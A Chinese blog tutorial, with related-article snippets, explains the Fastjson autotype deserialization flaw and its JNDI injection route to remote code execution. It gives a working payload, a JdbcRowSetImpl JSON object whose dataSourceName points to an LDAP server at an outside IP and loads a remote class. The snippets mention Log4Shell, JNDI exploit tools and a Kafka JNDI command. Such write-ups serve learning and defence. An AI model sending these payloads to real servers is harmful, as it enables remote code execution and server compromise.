JNDI注入-FastJson漏洞结合(详细原理版,小白也能看的懂)

已于 2023-09-14 20:56:54 修改
阅读量672 收藏 2
点赞数 1
文章标签: 网络 安全
于 2023-09-14 20:54:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_68064663/article/details/132863326
版权

目录

一.漏洞原理说明

二.漏洞复现

一.漏洞原理说明

javaee开发一个json转换功能,接受用户提交的JSON数据进行转换,转换的内容是ldap的远程执行class文件的地址,然后这个转换功能是用fastjson组件实现的,但是fastjson存在漏洞,漏洞就是在json数据转换时产生的fastjson反序列化漏洞,因为autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。

二.漏洞复现

生成远程调用的一个地址,可以在47.94.236.117上面调用计算器:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName": "ldap://47.94.236.117:1389/wktunx","autoCommit":true}

含义解释:@type指向com.sun. rowset. JdbcRowSetImpl,对项目中的com.sun.rowset.路径下的JdbcRowSetImpl文件里面的数据进行转换,其中"dataSourceName" 换成"ldap://47.94.236.117:1389/wktunx" , "autoCommit"换成true,替换完成后,dbcRowSetImpl文件可以调用ldap协议,可以执行ldap://47.94.236.117:1389/wktunx,就是运行计算器的功能,com.sun.rowset.JdbcRowSetImpl.execute ()可以实现:InitialContext.lookup ()类,同样也就可以使用rmi,ldap,不只有InitialContext.lookup ()类可以调用rmi和ldap

在这提交:

回显500弹出计算器

rmi和ldap会被jdk的版本限制,对于有的jdk版本ldap可以利用成功,rmi利用不成功。

似锦c
关注
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2898
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4j,Log4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
漏洞总结】远程命令执行漏洞分析
kali_Ma的博客
08-23 2802
简单介绍 1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Go
JNDI注入漏洞
qq_61553520的博客
05-23 1530
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
Log4j2的JNDI注入漏洞(CVE-2021-44228)
黑白的博客
10-13 6715
好好学习,天天向上。
Fastjson反序列化漏洞——JNDI注入
2301_79096184的博客
09-17 2233
JNDI注入
漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞
LJQClqjc的博客
12-23 1164
棱镜七彩漏洞深度分析
jndi-tool JNDI服务利用工具
01-06
在某些本的Fastjson中,存在远程代码执行(RCE)漏洞,攻击者可以利用这个漏洞通过JNDI注入来执行恶意代码。 另一个涉及JNDI的高知名度漏洞是Log4j 2.x的CVE-2021-44228,也被称为“Log4Shell”漏洞。Log4j是一个...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3367
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
JNDI RMI 注入(Log4j2漏洞
热门推荐
sun0322
12-24 1万+
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) vulhub复现
qq_53003652的博客
07-14 1362
本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。可以看到lm_hacker文件被成功创建(hacker是测试过的)启动kali:192.168.126.128。发送数据包,回到靶机,进入漏洞目录下。
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 3559
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 2814
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 1055
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
JNDI 注入漏洞的前世今生
有价值炮灰
12-14 3764
前两天的 log4j 漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下 JNDI 注入漏洞JNDI 101 首先第一个问题,什么是 JNDI,它的作用是什么? 根据官方文档,JNDI 全称为 Java Naming and Directory Interface,即 Java 名称与目录接口。虽然有点抽象,但我们至少知道它是一个接口;下一个问题是,Naming 和 Directory 是什么意思?很多相关资料都对其语焉不详,但其实官方对其有详细解释。 N
JNDI漏洞浅析
最新发布
qq_61620566的博客
10-17 879
JNDI注入漏洞
漏洞真实影响分析】Apache Kafka Connect 模块JNDI注入(CVE-2023-25194)
murphysec的博客
02-13 4816
Apache Kafka Connect 是Kafka中用于和其他数据系统传输数据的服务,其独立运行本可以在Kafka发布包中通过bin/connect-standalone.sh启动,默认会在8083端口开启HTTP REST API服务,可对连接器(Connector)的配置进行操作
fastjson jar包_fastjson 中的jndi注入
weixin_39979617的博客
11-20 238
0x01 前言前一章简单介绍了jndi注入的知识,这一章主要是分析一下fastjson 1.2.24本的反序列化漏洞,这个漏洞比较普遍的利用手法就是通过jndi注入的方式实现RCE,所以我觉得是一个挺好的JNDI注入实践案例。0x02 fastjson反序列化特点不同于我们之前提到的java反序列化,fastjson的序列化有其自身特点,我们通过一些小demo来展示如何使用fastjson。我们...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值